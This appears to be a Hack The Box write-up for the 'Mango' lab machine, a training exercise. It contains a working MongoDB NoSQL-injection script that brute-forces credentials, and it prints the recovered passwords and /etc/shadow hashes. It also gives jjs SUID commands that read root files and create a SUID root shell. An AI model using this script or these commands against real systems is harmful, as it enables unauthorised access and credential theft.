IP: 10.129.1.219
Started with nmap scan
┌──(kali㉿kali)-[~/htb/mango] └─$ nmap -sC -sV 10.129.1.219 -oN mango_initial.nmap Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-06 05:24 IST Nmap scan report for 10.129.1.219 Host is up (0.41s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a88fd96fa6e4ee56e3ef54546d560cf5 (RSA) | 256 6a1cba891eb0572ffe63e1617289b4cf (ECDSA) |_ 256 9070fb6f38aedc3b0b316864b04e7dc9 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: 403 Forbidden 443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu)) |_http-title: Mango | Search Base |_http-server-header: Apache/2.4.29 (Ubuntu) | tls-alpn: |_ http/1.1 |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN | Not valid before: 2019-09-27T14:21:19 |_Not valid after: 2020-09-26T14:21:19 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 90.96 seconds
We can see 3 open ports.
added mango.htb and staging-order.mango.htb to our /etc/hosts
Opening domain mango.htb in ssl I found
and opening staging-order.mango.htb without ssl
Using this login page. If I try with admin’— and password it does not return any value or error. May be this is mongo db and the backend is php.
So if we use [] php will treat it as array and as mongo use $eq and $ne so if we try
We got 302 found that means it is working.
But opening the homepage with login
The blind is working but we are getting error.
from hacktricks I found one login bruteforce script for mongodb
import requests import string url = "http://staging-order.mango.htb" headers = {"Host": "staging-order.mango.htb"} cookies = {"PHPSESSID": "s3gcsgtqre05bah2vt6tibq8lsdfk"} possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ] def get_password(username): print("Extracting password of "+username) params = {"username":username, "password[$regex]":"", "login": "login"} password = "^" while True: for c in possible_chars: params["password[$regex]"] = password + c + ".*" pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False) if int(pr.status_code) == 302: password += c break if c == possible_chars[-1]: print("Found password "+password[1:].replace("\\", "")+" for username "+username) return password[1:].replace("\\", "") def get_usernames(): usernames = [] params = {"username[$regex]":"", "password[$regex]":".*", "login": "login"} for c in possible_chars: username = "^" + c params["username[$regex]"] = username + ".*" pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False) if int(pr.status_code) == 302: print("Found username starting with "+c) while True: for c2 in possible_chars: params["username[$regex]"] = username + c2 + ".*" if int(requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False).status_code) == 302: username += c2 print(username) break if c2 == possible_chars[-1]: print("Found username: "+username[1:]) usernames.append(username[1:]) break return usernames for u in get_usernames(): get_password(u)
and I found username and passwords
┌──(kali㉿kali)-[~/htb/mango] └─$ python3 mongo_brute.py Found username starting with a ^ad ^adm ^admi ^admin Found username: admin Found username starting with m ^ma ^man ^mang ^mango Found username: mango Extracting password of admin Found password t9KcS3>!0B#2 for username admin Extracting password of mango Found password h3mXK8RhU~f{]f5H for username mango
I can loginto ssh with the username mango and its password.
But I can’t access the userflag because it owned by admin.
mango@mango:/home/admin$ ls -la total 24 drwxr-xr-x 2 admin admin 4096 Sep 30 2019 . drwxr-xr-x 4 root root 4096 Sep 27 2019 .. lrwxrwxrwx 1 admin admin 9 Sep 27 2019 .bash_history -> /dev/null -rw-r--r-- 1 admin admin 220 Apr 4 2018 .bash_logout -rw-r--r-- 1 admin admin 3771 Apr 4 2018 .bashrc -rw-r--r-- 1 admin admin 807 Apr 4 2018 .profile -r-------- 1 admin admin 33 Oct 9 13:17 user.txt mango@mango:/home/admin$ cat user.txt cat: user.txt: Permission denied
If I change user to admin using su admin and the password we found earlier, we can login into admin and grab the user flag.
mango@mango:/home/admin$ su admin Password: $ id uid=4000000000(admin) gid=1001(admin) groups=1001(admin) $ cat user.txt c1db8b2dc68a1dbe1bbd65be8f557e7c $
Privilege escalation:
Now If I try sudo -l it returns nothing.
Checking for suid
find / -type f -perm -04000 -ls 2>/dev/null 786500 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount 786527 44 -rwsr-xr-x 1 root root 43088 Oct 15 2018 /bin/mount 786585 28 -rwsr-xr-x 1 root root 26696 Oct 15 2018 /bin/umount 786567 44 -rwsr-xr-x 1 root root 44664 Jan 25 2018 /bin/su 786551 64 -rwsr-xr-x 1 root root 64424 Mar 9 2017 /bin/ping 66 40 -rwsr-xr-x 1 root root 40152 May 15 2019 /snap/core/7713/bin/mount 80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/7713/bin/ping 81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/7713/bin/ping6 98 40 -rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/7713/bin/su 116 27 -rwsr-xr-x 1 root root 27608 May 15 2019 /snap/core/7713/bin/umount 2657 71 -rwsr-xr-x 1 root root 71824 Mar 25 2019 /snap/core/7713/usr/bin/chfn 2659 40 -rwsr-xr-x 1 root root 40432 Mar 25 2019 /snap/core/7713/usr/bin/chsh 2735 74 -rwsr-xr-x 1 root root 75304 Mar 25 2019 /snap/core/7713/usr/bin/gpasswd 2827 39 -rwsr-xr-x 1 root root 39904 Mar 25 2019 /snap/core/7713/usr/bin/newgrp 2840 53 -rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/7713/usr/bin/passwd 2950 134 -rwsr-xr-x 1 root root 136808 Jun 10 2019 /snap/core/7713/usr/bin/sudo 3049 42 -rwsr-xr-- 1 root systemd-resolve 42992 Jun 10 2019 /snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper 3419 419 -rwsr-xr-x 1 root root 428240 Mar 4 2019 /snap/core/7713/usr/lib/openssh/ssh-keysign 6452 105 -rwsr-sr-x 1 root root 106696 Aug 30 2019 /snap/core/7713/usr/lib/snapd/snap-confine 7626 386 -rwsr-xr-- 1 root dip 394984 Jun 12 2018 /snap/core/7713/usr/sbin/pppd 66 40 -rwsr-xr-x 1 root root 40152 May 16 2018 /snap/core/6350/bin/mount 80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/6350/bin/ping 81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/6350/bin/ping6 98 40 -rwsr-xr-x 1 root root 40128 May 17 2017 /snap/core/6350/bin/su 116 27 -rwsr-xr-x 1 root root 27608 May 16 2018 /snap/core/6350/bin/umount 2658 71 -rwsr-xr-x 1 root root 71824 May 17 2017 /snap/core/6350/usr/bin/chfn 2660 40 -rwsr-xr-x 1 root root 40432 May 17 2017 /snap/core/6350/usr/bin/chsh 2735 74 -rwsr-xr-x 1 root root 75304 May 17 2017 /snap/core/6350/usr/bin/gpasswd 2827 39 -rwsr-xr-x 1 root root 39904 May 17 2017 /snap/core/6350/usr/bin/newgrp 2840 53 -rwsr-xr-x 1 root root 54256 May 17 2017 /snap/core/6350/usr/bin/passwd 2950 134 -rwsr-xr-x 1 root root 136808 Jul 4 2017 /snap/core/6350/usr/bin/sudo 3049 42 -rwsr-xr-- 1 root systemd-resolve 42992 Jan 12 2017 /snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper 3419 419 -rwsr-xr-x 1 root root 428240 Nov 5 2018 /snap/core/6350/usr/lib/openssh/ssh-keysign 6445 97 -rwsr-sr-x 1 root root 98472 Jan 29 2019 /snap/core/6350/usr/lib/snapd/snap-confine 7615 386 -rwsr-xr-- 1 root dip 394984 Jun 12 2018 /snap/core/6350/usr/sbin/pppd 263053 40 -rwsr-xr-x 1 root root 37136 Jan 25 2018 /usr/bin/newuidmap 263052 40 -rwsr-xr-x 1 root root 40344 Jan 25 2018 /usr/bin/newgrp 262942 76 -rwsr-xr-x 1 root root 75824 Jan 25 2018 /usr/bin/gpasswd 263069 60 -rwsr-xr-x 1 root root 59640 Jan 25 2018 /usr/bin/passwd 263051 40 -rwsr-xr-x 1 root root 37136 Jan 25 2018 /usr/bin/newgidmap 263140 20 -rwsr-sr-x 1 root root 18161 Jul 15 2016 /usr/bin/run-mailcap 262848 76 -rwsr-xr-x 1 root root 76496 Jan 25 2018 /usr/bin/chfn 262850 44 -rwsr-xr-x 1 root root 44528 Jan 25 2018 /usr/bin/chsh 263194 148 -rwsr-xr-x 1 root root 149080 Jan 18 2018 /usr/bin/sudo 262797 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at 263230 20 -rwsr-xr-x 1 root root 18448 Mar 9 2017 /usr/bin/traceroute6.iputils 262806 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec 268892 44 -rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper 393793 100 -rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic 262966 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1 263423 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device 274666 12 -rwsr-sr-- 1 root admin 10352 Jul 18 2019 /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs 274590 428 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign 266298 100 -rwsr-sr-x 1 root root 101240 Mar 15 2019 /usr/lib/snapd/snap-confine
There is a lot of binary has suid. But this jjs binary is interesting. It does not drop the elevated privileges.
If I search on gtfobins.
echo "Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -pc \$@|sh\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)').waitFor()" | /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
running this i can see the shell symbol is changing but I can’t type any command.
echo 'var BufferedReader = Java.type("java.io.BufferedReader"); var FileReader = Java.type("java.io.FileReader"); var br = new BufferedReader(new FileReader("/root/root.txt")); while ((line = br.readLine()) != null) { print(line); }' | jjs
using this I can read the /root/root.txt and grab root flag.
$ jjs Warning: The jjs tool is planned to be removed from a future JDK release jjs> var BufferedReader = Java.type("java.io.BufferedReader"); jjs> var FileReader = Java.type("java.io.FileReader"); jjs> var br = new BufferedReader(new FileReader("/root/root.txt")); jjs> while ((line = br.readLine()) != null) { print(line); } 73f83e96420e914ddbe0f81a4230666f jjs>
We can grab shadow file using this method
echo 'var BufferedReader = Java.type("java.io.BufferedReader"); var FileReader = Java.type("java.io.FileReader"); var br = new BufferedReader(new FileReader("/etc/shadow")); while ((line = br.readLine()) != null) { print(line); }' | jjs
and we got the content
$ echo 'var BufferedReader = Java.type("java.io.BufferedReader"); var FileReader = Java.type("java.io.FileReader"); var br = new BufferedReader(new FileReader("/etc/shadow")); while ((line = br.readLine()) != null) { print(line); }' | jjs> > > Warning: The jjs tool is planned to be removed from a future JDK release jjs> var BufferedReader = Java.type("java.io.BufferedReader"); jjs> var FileReader = Java.type("java.io.FileReader"); jjs> var br = new BufferedReader(new FileReader("/etc/shadow")); jjs> while ((line = br.readLine()) != null) { print(line); } root:$6$6uG5902N$XonoH4wyYV2f8.7fEVXLe03mLoH3r1lnJ59s2jTWTAV.qZKZH.CXYjCWuUG5gLnioLpSTBA3F1LXqQAOqdAJN/:18166:0:99999:7::: daemon:*:17941:0:99999:7::: bin:*:17941:0:99999:7::: sys:*:17941:0:99999:7::: sync:*:17941:0:99999:7::: games:*:17941:0:99999:7::: man:*:17941:0:99999:7::: lp:*:17941:0:99999:7::: mail:*:17941:0:99999:7::: news:*:17941:0:99999:7::: uucp:*:17941:0:99999:7::: proxy:*:17941:0:99999:7::: www-data:*:17941:0:99999:7::: backup:*:17941:0:99999:7::: list:*:17941:0:99999:7::: irc:*:17941:0:99999:7::: gnats:*:17941:0:99999:7::: nobody:*:17941:0:99999:7::: systemd-network:*:17941:0:99999:7::: systemd-resolve:*:17941:0:99999:7::: syslog:*:17941:0:99999:7::: messagebus:*:17941:0:99999:7::: _apt:*:17941:0:99999:7::: lxd:*:17941:0:99999:7::: uuidd:*:17941:0:99999:7::: dnsmasq:*:17941:0:99999:7::: landscape:*:17941:0:99999:7::: pollinate:*:17941:0:99999:7::: sshd:*:18166:0:99999:7::: mango:$6$D9GOkLkh$Il/e.J35n8XniWWTWXPoXj0w.YwwVS2uAy5EHR8GoyZBoMj02sGSLXakk0nsCJS2v1SrWA6y.y2GCR3L/T5h41:18166:0:99999:7::: admin:$6$Ls6eLFhb$XoRxrUPmgvjcZSoN1OnYWIlb7ALWvcaiK3MubdX99C08H1lWLfXDipAmqdRc6yikHUwaixBD/UnK/GhFx/tIY1:18166:0:99999:7::: mongodb:*:18166:0:99999:7:::
But john unable to get the password using wordlist rockyou.
┌──(kali㉿kali)-[~/htb/mango] └─$ cat root_hash root:$6$6uG5902N$XonoH4wyYV2f8.7fEVXLe03mLoH3r1lnJ59s2jTWTAV.qZKZH.CXYjCWuUG5gLnioLpSTBA3F1LXqQAOqdAJN/:18166:0:99999:7::: ┌──(kali㉿kali)-[~/htb/mango] └─$ john -wordlist=/usr/share/wordlists/rockyou.txt root_hash Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 ASIMD 2x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:04:41 6.03% (ETA: 12:28:22) 0g/s 3496p/s 3496c/s 3496C/s computer?..collants 0g 0:00:28:37 40.46% (ETA: 12:21:24) 0g/s 3446p/s 3446c/s 3446C/s mac82571..mac12600 0g 0:00:45:45 66.20% (ETA: 12:19:47) 0g/s 3462p/s 3462c/s 3462C/s boston.com..bossstatus 0g 0:01:07:16 98.01% (ETA: 12:19:18) 0g/s 3486p/s 3486c/s 3486C/s 040019500..03wood 0g 0:01:08:37 DONE (2023-10-06 12:19) 0g/s 3483p/s 3483c/s 3483C/s !!!playboy!!!7..*7¡Vamos! Session completed. ┌──(kali㉿kali)-[~/htb/mango] └─$ john --show root.hash stat: root.hash: No such file or directory ┌──(kali㉿kali)-[~/htb/mango] └─$ john --show root_hash 0 password hashes cracked, 1 left ┌──(kali㉿kali)-[~/htb/mango] └─$
We can try copying the sh to /tmp . let’s check if it is possible.
Java.type('java.lang.Runtime').getRuntime().exec('cp /bin/sh /tmp/sh').waitFor()
jjs> Java.type('java.lang.Runtime').getRuntime().exec('cp /bin/sh /tmp/sh').waitFor() 0
we got output 0 that means it is successfully copied to /tmp
If we check
jjs> exit() $ ls -la /tmp/sh -rwxr-xr-x 1 root admin 121432 Oct 10 03:08 /tmp/sh
But still it is admin and we don’t have execute as root suid.
If we apply suid again.
Java.type('java.lang.Runtime').getRuntime().exec('chmod u+s /tmp/sh').waitFor()
output
jjs> Java.type('java.lang.Runtime').getRuntime().exec('chmod u+s /tmp/sh').waitFor() 0
If we check now we have execute as root suid.
jjs> exit() $ ls -la /tmp/sh -rwsr-xr-x 1 root admin 121432 Oct 10 03:08 /tmp/sh $ /tmp/sh -p # id uid=4000000000(admin) gid=1001(admin) euid=0(root) groups=1001(admin)
We can now grab the root flag.
# cat /root/root.txt 73f83e96420e914ddbe0f81a4230666f
Share article